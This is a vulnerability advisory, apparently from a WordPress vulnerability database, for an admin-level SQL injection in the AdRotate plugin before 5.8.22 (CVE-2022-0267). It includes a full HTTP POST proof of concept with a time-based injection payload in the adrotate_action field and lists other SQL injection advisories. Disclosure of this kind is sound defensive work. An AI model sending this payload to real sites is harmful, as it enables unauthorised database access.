AdRotate < 5.8.22 – Admin+ SQL Injection | CVE 2022-0267 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the adrotate_action before using it in a SQL statement via the adrotate_request_action function available to admins, leading to a SQL injection

Proof of Concept

Get the nonce from one of the bulk action, for example /wp-admin/admin.php?page=adrotate and look for adrotate_nonce in the source

POST /wp-admin/ HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 107
Connection: close
Cookie: [admin+]

adrotate_action_submit=1&adrotate_nonce=07d896329d&adrotate_action=renew-1 where sleep(10)#&bannercheck[]=1

Affects Plugins

Fixed in 5.8.22

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top

Submitter twitter

Verified

Yes

WPVDB ID

7df70f49-547f-4bdb-bf9b-2e06f93488c6

Timeline

Publicly Published

2022-02-07 (about 2 years ago)

Added

2022-02-07 (about 2 years ago)

Last Updated

2022-09-26 (about 1 years ago)

Other

Published

Title

Published

2021-08-22

Title

WP-Board <= 1.1 (beta) - Unauthenticated SQL Injection

Published

2022-07-22

Title

Homepage Product Organizer for WooCommerce <= 1.1 - Subscriber+ SQLi

Published

2023-11-28

Title

WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs endpoint

Published

2014-12-03

Title

Google Document Embedder <= 2.5.16 - SQL Injection

Published

2015-02-09

Title

WP eCommerce <= 3.8.6 - SQL Injection